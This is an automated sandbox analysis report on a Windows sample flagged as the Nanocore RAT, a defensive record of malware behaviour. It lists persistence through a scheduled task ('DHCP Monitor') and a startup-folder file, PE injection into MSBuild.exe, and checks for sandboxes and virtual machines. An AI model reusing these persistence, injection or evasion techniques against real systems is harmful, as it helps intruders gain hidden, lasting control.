        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
        Source: qnJXJsqt1M.exeStatic file information: File size 1253376 > 1048576
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: indows\MSBuild.pdbpdbild.pdbs source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\MSBuild.pdbl source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\exe\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: f:\dd\vsproject\xmake\XMakeCommandLine\objr\i386\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: MSBuild.exe, 00000001.00000002.507151725.00000000059F0000.00000002.00000001.sdmp
        Source: Binary string: C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: qnJXJsqt1M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: qnJXJsqt1M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: qnJXJsqt1M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: qnJXJsqt1M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: qnJXJsqt1M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation:

        .NET source code contains potential unpacker
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AEE01E LoadLibraryA,GetProcAddress,
        Source: znytpstdcrwsisx.exe.0.drStatic PE information: real checksum: 0x12035b should be: 0x140fd1
        Source: qnJXJsqt1M.exeStatic PE information: real checksum: 0x12035b should be: 0x133735
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AF6B05 push ecx; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_01309E34 pushfd ; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_01309D5C push 780130CBh; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_013074B8 push ebp; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_013074AC push ecx; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_0130769F push es; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_013062D1 push ebx; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_013062D4 push ebx; retf
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D76B05 push ecx; ret
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeFile created: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe

        Boot Survival:

        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp'
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.url
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AEEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B38111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AF123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: znytpstdcrwsisx.exe, 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
        Source: qnJXJsqt1M.exe, 00000000.00000003.237907069.0000000001686000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXEI0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWindow / User API: threadDelayed 407
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWindow / User API: foregroundWindowGot 921
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 2116Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 972Thread sleep time: -160000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 5016Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 4364Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B163F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B16CA9 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B21B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B160DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1F56F FindFirstFileW,FindClose,
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D96CA9 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AEDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,
        Source: MSBuild.exe, 00000001.00000002.507773462.00000000066B0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: MSBuild.exe, 00000001.00000002.500546420.0000000001188000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6>
        Source: znytpstdcrwsisx.exe, 0000000B.00000003.263480131.0000000001004000.00000004.00000001.sdmpBinary or memory string: vmtoolsd.exera2khkzkmkkprl7yom4gi135e3nfurFkrgm
        Source: qnJXJsqt1M.exe, 00000000.00000003.237907069.0000000001686000.00000004.00000001.sdmpBinary or memory string: vmtoolsd.exe
        Source: znytpstdcrwsisx.exe, 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmpBinary or memory string: vmtoolsd.exeI0
        Source: MSBuild.exe, 00000001.00000002.507773462.00000000066B0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: MSBuild.exe, 00000001.00000002.507773462.00000000066B0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: qnJXJsqt1M.exe, 00000000.00000003.238668684.0000000001563000.00000004.00000001.sdmpBinary or memory string: vmtoolsd.exera2khkzkmkkprl7yom4gi135e3nfur
        Source: MSBuild.exe, 00000001.00000002.507773462.00000000066B0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B26AAF BlockInput,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AD3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B03920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AEE01E LoadLibraryA,GetProcAddress,
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D405B5 mov edx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D40175 mov edx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D40405 mov edx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D40365 mov edx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AF8189 SetUnhandledExceptionFilter,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AF81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D781AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000 protect: page execute and read and write
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000 value starts with: 4D5A
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 402000
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 420000
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 422000
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: D7E008
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 402000
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 420000
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 422000
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 10C8008
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0B106 LogonUserW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AD3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AEEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B174BB mouse_event,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp'
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B171FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
        Source: MSBuild.exe, 00000001.00000002.501791419.00000000019A0000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
        Source: MSBuild.exe, 00000001.00000002.506079771.0000000003478000.00000004.00000001.sdmp Binary or memory string: Program Manager
        Source: qnJXJsqt1M.exe, MSBuild.exe, 00000001.00000002.501791419.00000000019A0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
        Source: MSBuild.exe, 00000001.00000002.501791419.00000000019A0000.00000002.00000001.sdmp Binary or memory string: Progman
        Source: MSBuild.exe, 00000001.00000002.506079771.0000000003478000.00000004.00000001.sdmp Binary or memory string: Program Manager@u
        Source: qnJXJsqt1M.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
        Source: MSBuild.exe, 00000001.00000002.501791419.00000000019A0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
        Source: MSBuild.exe, 00000001.00000002.500546420.0000000001188000.00000004.00000020.sdmp Binary or memory string: Program Managersoft.NET\Framework\v2.0.50727\MSBuild.exeD;
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe Code function: 0_2_00AF65C4 cpuid
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe Code function: 0_2_00B2091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe Code function: 0_2_00B4B340 GetUserNameW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe Code function: 0_2_00AEDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        Yara detected Nanocore RAT
        Source: qnJXJsqt1M.exe Binary or memory string: WIN_81
        Source: qnJXJsqt1M.exe Binary or memory string: WIN_XP
        Source: qnJXJsqt1M.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
        Source: znytpstdcrwsisx.exe, 0000000B.00000003.263480131.0000000001004000.00000004.00000001.sdmp Binary or memory string: t0lj1bz7kyfvrnjhanglri8hhtcuWIN_7rs4zlupb30fv5a
        Source: qnJXJsqt1M.exe Binary or memory string: WIN_XPe
        Source: qnJXJsqt1M.exe Binary or memory string: WIN_VISTA
        Source: qnJXJsqt1M.exe Binary or memory string: WIN_7
        Source: qnJXJsqt1M.exe Binary or memory string: WIN_8
